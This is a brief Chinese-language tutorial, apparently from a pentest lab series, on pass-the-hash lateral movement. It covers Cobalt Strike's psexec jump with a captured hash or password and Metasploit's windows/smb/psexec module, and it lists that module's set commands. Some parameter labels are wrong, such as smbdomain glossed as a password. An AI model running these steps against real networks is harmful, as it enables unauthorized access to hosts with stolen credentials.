一、使用CS的psexec实现哈希攻击
1.在扫描完内网其他主机后选择一台需要传递的主机
2.实验之前必须已经获得用户名的哈希值或明文密码
右键选择jump—>psexec功能
2.配置参数
选择一个用户名密码和参数,但必须与需要传递的主机信息一致
选择一个监听器和一个已经得到的session
3.执行命令查看结果
传递成功
上线成功
二、使用msf的psexec功能
如果cs一直无法传递,可以试试使用msf的psexec功能
1.配置进入内网路由(前面一篇文章有做法)
2.使用use exploit/windows/smb/psexec模块进行传递
这里总共要配置5个参数(和cs一样)
set rhosts 目标地址
set lport 监听端口
set lhost 监听主机
set smbuser 目标主机名
set smbpass 目标密码
set smbdomain 目标密码
3.直接run运行
成功获得会话